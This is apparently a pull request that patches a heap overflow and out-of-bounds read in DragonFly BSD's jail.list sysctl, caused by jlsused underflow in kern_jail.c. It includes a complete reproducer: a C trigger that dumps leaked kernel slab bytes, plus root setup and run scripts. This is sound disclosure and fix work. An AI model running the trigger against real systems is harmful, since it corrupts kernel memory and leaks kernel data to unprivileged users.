### PR TITLE
jail: heap overflow in jail.list sysctl via jlsused underflow

### DIFF
--- a/sys/kern/kern_jail.c
+++ b/sys/kern/kern_jail.c
@@ -707,7 +707,15 @@ retry:
 		kfree(freepath, M_TEMP);
 		if (count < 0)
 			goto end;
-		jlsused += count;
+		/* ksnprintf() returns the would-be length, not the bytes
+		   actually written.  Clamp the cursor so the invariant
+		   jlsused <= jlssize always holds; otherwise the unsigned
+		   "jlssize - jlsused" arithmetic below (and the SYSCTL_OUT
+		   length) can underflow/overflow the buffer. */
+		if (count >= (int)(jlssize - jlsused))
+			jlsused = jlssize;
+		else
+			jlsused += count;
 
 		/* Copy the IPS */
 		SLIST_FOREACH(jip, &pr->pr_ips, entries) {
@@ -730,7 +738,11 @@ retry:
 				break;
 			}
 
-			if ((jlssize - jlsused) < (strlen(oip) + 1)) {
+			/* Guard explicitly against jlsused >= jlssize so the
+			   unsigned "jlssize - jlsused" subtraction cannot
+			   underflow to ~UINT_MAX and bypass this check. */
+			if (jlsused >= jlssize ||
+			    (jlssize - jlsused) < (strlen(oip) + 1)) {
 				error = ERANGE;
 				goto end;
 			}
@@ -738,7 +750,12 @@ retry:
 					  " %s", oip);
 			if (count < 0)
 				goto end;
-			jlsused += count;
+			/* ksnprintf() returns the would-be length; clamp to
+			   preserve jlsused <= jlssize (see comment above). */
+			if (count >= (int)(jlssize - jlsused))
+				jlsused = jlssize;
+			else
+				jlsused += count;
 		}
 	}
 


### PR DESCRIPTION
# jail: heap overflow in jail.list sysctl via jlsused underflow

`sysctl_jail_list()` in `sys/kern/kern_jail.c` sizes its scratch buffer as `jlssize = count * 1024` and advances a cursor `jlsused` by the return value of `ksnprintf()`. But `ksnprintf()` returns the number of characters that would have been written, not the count actually stored, so when a jail's formatted line (host up to 255 bytes plus a long chroot path) exceeds the 1024-byte budget the truncated write still bumps `jlsused` past `jlssize`. The IP loop then computes `(jlssize - jlsused)` as an unsigned underflow to ~UINT_MAX, so its length check never trips and `ksnprintf(jls + jlsused, ~UINT_MAX, ...)` writes each IP past the allocation, corrupting the adjacent slab. Finally `SYSCTL_OUT(req, jls, jlsused)` copies the overlong `jlsused` bytes out to userspace, leaking adjacent slab slack. Any unprivileged, unjailed user can read `jail.list` once at least one jail exists whose `host + fullpath` formats to more than ~1024 bytes.

## Fix

Clamp `jlsused` to `jlssize` after each `ksnprintf()` advance so the cursor never exceeds the buffer, and make the IP-loop bounds check reject `jlsused >= jlssize` before the unsigned subtraction so it cannot underflow. When a line genuinely overflows the budget the handler now returns `ERANGE` instead of overrunning.

## Before / after

`#0 unpatched` (DragonFly 6.5-DEVELOPMENT), an unprivileged user reads `jail.list` with one jail whose formatted line is ~1226 bytes:

```
kernel reports jail.list length = 1261 bytes
jlssize (count*1024)         = 1024
OOB READ vs actual alloc end = 109 bytes (info leak of adjacent slab slack)
OOB WRITE (IPs written past alloc end) also occurred in kernel heap
non-zero bytes in OOB-vs-alloc region: 36
```

Deterministic: byte-identical across 3 back-to-back runs (1261 returned, 109-byte OOB read, 36-byte OOB write).

`#1 patched` (same kernel + this fix), same jail:

```
FIX CONFIRMED: kernel returned ERANGE (refused to format oversized jail.list line)
-> no OOB write into adjacent slab, no OOB read to userspace.
```

## Reproducer

Precondition: at least one jail whose `host + fullpath` formats to more than ~1024 bytes (e.g. a 255-byte hostname plus a ~960-byte chroot path). Then any unprivileged, unjailed user can trigger it by reading the `jail.list` sysctl.

```c
/*
 * jail.list sysctl OOB write + OOB read proof.
 *
 * The bug (sys/kern/kern_jail.c:661 sysctl_jail_list):
 *   - jlssize = count*1024, jlsused = 0 (both unsigned int, :671)
 *   - kmalloc(jlssize+1) -> bucket-rounded alloc (e.g. 1025 -> 1152) (:689)
 *   - ksnprintf(jls+jlsused, (jlssize-jlsused), "%d %s %s", jid, host, path)
 *       returns the WOULD-BE length (subr_prf.c:549 retval++ is unconditional,
 *       snprintf_func only writes if remain>=2).  With host(255)+path(967)
 *       the format is ~1226 bytes but size is only 1024 -> truncated write,
 *       retval=1226, jlsused += 1226 -> jlsused > jlssize.  (:704-710)
 *   - IP loop: (jlssize - jlsused) underflows unsigned -> ~UINT_MAX (:733)
 *       bounds check (huge < small) is FALSE -> doesn't trip ERANGE
 *       ksnprintf(jls+jlsused, ~UINT_MAX, " %s", ip) writes at jls+1226,
 *       which is past the 1152-byte alloc end -> OOB WRITE into adjacent
 *       slab memory.  Each IP adds ~9-13 bytes of OOB write. (:737)
 *   - SYSCTL_OUT(req, jls, jlsused) copies jlsused bytes (e.g. 1261) from
 *       the 1152-byte alloc to userspace -> OOB READ of (jlsused-1152)
 *       bytes of adjacent slab slack -> INFO LEAK. (:749)
 *
 * Reachable: any unprivileged unjailed user (handler only checks !jailed,
 * kern_jail.c:679).  Precondition: >=1 jail whose host+fullpath formatted
 * length exceeds ~1024 bytes (deep chroot path created by root).
 *
 * Build: cc -O2 -o jail_list_trigger jail_list_trigger.c
 * Run as ANY unprivileged user (after root creates a long-line jail).
 */

#include <sys/types.h>
#include <sys/sysctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int
main(void)
{
	int name[8];
	size_t namelen = 8;

	/* OID is top-level "jail.list" (SYSCTL_OID(_jail, OID_AUTO, list, ...)
	 * at kern_jail.c:757 -- NOT kern.jail.list. */
	if (sysctlnametomib("jail.list", name, &namelen) != 0) {
		perror("sysctlnametomib(jail.list)");
		fprintf(stderr, "[!] The OID is 'jail.list', not 'kern.jail.list'.\n");
		return 1;
	}
	fprintf(stderr, "[*] MIB for jail.list:");
	for (size_t i = 0; i < namelen; i++)
		fprintf(stderr, " %d", name[i]);
	fprintf(stderr, "\n");

	/* Probe length.
	 *
	 * On a FIXED kernel, when the per-jail formatted line exceeds the
	 * buffer budget, sysctl_jail_list trips ERANGE and returns it
	 * cleanly (no OOB write, no OOB read) -- so the probe itself fails.
	 * That is the success signature for the fix; report it and exit 0. */
	size_t buflen = 0;
	int probe_rc = sysctl(name, namelen, NULL, &buflen, NULL, 0);
	if (probe_rc != 0) {
		if (errno == ERANGE) {
			printf("[+] FIX CONFIRMED: kernel returned ERANGE "
			    "(refused to format oversized jail.list line)\n");
			printf("    -> no OOB write into adjacent slab, "
			    "no OOB read to userspace.  Bug closed.\n");
			return 0;
		}
		perror("sysctl probe");
		return 1;
	}
	fprintf(stderr, "[*] kernel reports jail.list length = %zu bytes\n", buflen);
	if (buflen == 0) {
		fprintf(stderr, "[-] no jails configured; ask root to create a "
		    "long-line jail first.\n");
		return 0;
	}

	/* Read. */
	char *buf = malloc(buflen);
	if (!buf) { perror("malloc"); return 1; }
	size_t got = buflen;
	if (sysctl(name, namelen, buf, &got, NULL, 0) != 0) {
		perror("sysctl read");
		free(buf);
		return 1;
	}
	fprintf(stderr, "[*] sysctl read returned %zu bytes\n", got);

	/* jlssize = count * 1024.  Count jail lines. */
	int nlines = 1;
	for (size_t i = 0; i < got; i++)
		if (buf[i] == '\n')
			nlines++;
	size_t jlssize = (size_t)nlines * 1024;
	fprintf(stderr, "[*] %d jail lines -> jlssize = %zu bytes "
	    "(kmalloc(%zu+1) -> bucket 1152)\n",
	    nlines, jlssize, jlssize);

	if (got > jlssize) {
		size_t oob_vs_jlssize = got - jlssize;
		size_t alloc = 1152; /* zoneindex bucket for size 1025 */
		size_t oob_vs_alloc = (got > alloc) ? (got - alloc) : 0;
		printf("[+] BUG CONFIRMED:\n");
		printf("    kernel returned %zu bytes\n", got);
		printf("    jlssize (count*1024)         = %zu\n", jlssize);
		printf("    kmalloc bucket (alloc)       = %zu\n", alloc);
		printf("    OOB READ vs jlssize          = %zu bytes\n",
		    oob_vs_jlssize);
		printf("    OOB READ vs actual alloc end = %zu bytes "
		    "(info leak of adjacent slab slack)\n", oob_vs_alloc);
		printf("    OOB WRITE (IPs written past alloc end during "
		    "IP loop) also occurred in kernel heap\n");

		/* Show tail bytes -- the OOB region includes IPs the kernel
		 * wrote past the buffer end + any non-zero slab residue. */
		size_t off = got > 128 ? got - 128 : 0;
		size_t n = got - off;
		fprintf(stderr, "[*] last %zu bytes (offset %zu..%zu):\n",
		    n, off, got);
		for (size_t i = 0; i < n; i += 16) {
			fprintf(stderr, "    %04zx  ", off + i);
			for (size_t j = 0; j < 16 && i + j < n; j++)
				fprintf(stderr, "%02x ",
				    (unsigned char)buf[off + i + j]);
			fprintf(stderr, " ");
			for (size_t j = 0; j < 16 && i + j < n; j++) {
				unsigned char c = buf[off + i + j];
				fprintf(stderr, "%c",
				    (c >= 32 && c < 127) ? c : '.');
			}
			fprintf(stderr, "\n");
		}

		/* Count non-zero bytes in the OOB-vs-alloc region. */
		size_t nonzero = 0;
		for (size_t i = alloc; i < got; i++)
			if (buf[i] != 0)
				nonzero++;
		printf("    non-zero bytes in OOB-vs-alloc region: %zu "
		    "(our written IPs + any stale slab data)\n", nonzero);
	} else {
		printf("[-] output (%zu) <= jlssize (%zu); bug did not fire "
		    "(need a jail with >1024-byte formatted line)\n", got, jlssize);
	}

	free(buf);
	return 0;
}
```

The reproducer is two-phase: root provisions a long-line jail, then any unprivileged user reads the sysctl.

`setup_jail.sh` (run as root; builds a ~960-byte chroot path, a 255-byte hostname and a few IPs, and launches a jail kept alive by a sleeper):

```sh
#!/bin/sh
# phase 1 - one-shot jail setup. Builds the deep path, /s sleeper,
# and launches the jail all in one process so no ssh disconnect can kill it.
#
# Run as root:  sh setup_jail.sh <depth> <n_ips>

set -u

DEPTH=${1:-60}
N_IPS=${2:-4}

# 1. Kill any prior jails + sleepers
pkill -9 jail 2>/dev/null
pkill -9 -f "/s$" 2>/dev/null
sleep 2

# 2. Fresh start
rm -rf /tmp/jt
mkdir -p /tmp/jt

# 3. Static sleeper binary
cat > /tmp/jt/s.c <<'C'
#include <unistd.h>
int main(void){ for(;;) pause(); return 0; }
C
cc -static -O2 -o /tmp/jt/s /tmp/jt/s.c

# 4. Build deep path one level at a time, copying /s into the deepest dir.
p=/tmp/jt
n=0
while [ "$n" -lt "$DEPTH" ]; do
    p="$p/lllllllllllllll"
    if ! mkdir "$p" 2>/dev/null; then
        echo "setup: mkdir failed at depth=$n"
        break
    fi
    n=$((n+1))
done
PLEN=$(printf '%s' "$p" | wc -c)
echo "setup: depth=$n path_len=$PLEN"

# 5. Copy sleeper into chroot as /s
cp /tmp/jt/s "$p/s"
if [ ! -f "$p/s" ]; then
    echo "setup: ERROR - /s missing after cp; trying install"
    install /tmp/jt/s "$p/s"
fi
ls -la "$p/s" 2>&1 | head -1

# 6. Max-length hostname
host=$(printf 'h%.0s' $(seq 1 255))

# 7. N_IPS comma-separated IPv4 addresses
ips=10.0.0.1
i=2
while [ "$i" -le "$N_IPS" ]; do
    ips="$ips,10.0.0.$i"
    i=$((i+1))
done
echo "setup: n_ips=$N_IPS ips_len=${#ips}"

# 8. Launch jail in background.  Sleeper /s inside keeps prison alive
#    after this script and the ssh session exit.
/usr/sbin/jail "$p" "$host" "$ips" /s </dev/null >/tmp/jt/jout 2>&1 &
sleep 4

echo "--- jout (errors) ---"
cat /tmp/jt/jout 2>/dev/null
echo "--- jls ---"
/usr/sbin/jls
echo "--- sleeper ---"
pgrep -lf "/s$"
```

`build.sh`:

```sh
#!/bin/sh
# build - compiles the unprivileged trigger.
set -e
cd "$(dirname "$0")"
cc -O2 -o jail_list_trigger jail_list_trigger.c
echo "build: jail_list_trigger (exit=$?)"
```

`run.sh` (two-phase orchestrator: root provisions, then any user triggers):

```sh
#!/bin/sh
# PoC run - two-phase.
#
# Phase 1 (root): create a jail with a deep chroot path + max hostname +
#                 a few IPs, so sysctl_jail_list's per-jail formatted line
#                 ("JID <space> hostname <space> fullpath") exceeds the
#                 1024-byte per-jail budget -> unsigned underflow ->
#                 heap OOB write + OOB read.
# Phase 2 (any unprivileged user): read sysctl jail.list -> trigger the bug.
#
# Usage:  ./run.sh                 # auto-detect: root does phase 1, user does phase 2
#         ./run.sh setup           # phase 1 only (root)
#         ./run.sh trigger         # phase 2 only (any user)
#
# Expected output (bug present): "BUG CONFIRMED: ... OOB READ ..."
# Expected output (fixed kernel): "FIX CONFIRMED: kernel returned ERANGE"

set -e
cd "$(dirname "$0")"

MODE=${1:-auto}

if [ "$MODE" = "setup" ] || { [ "$MODE" = "auto" ] && [ "$(id -u)" -eq 0 ]; }; then
    echo "=== phase 1 (root): provisioning long-path jail ==="
    sh ./setup_jail.sh 60 4
    exit 0
fi

echo "=== phase 2 (uid=$(id -u)): triggering jail.list ==="
./jail_list_trigger
```

Build and run:

```
sh ./build.sh
sudo sh ./run.sh setup     # root: provision the long-line jail
su someuser -c './run.sh'  # any unprivileged user: triggers the OOB
```
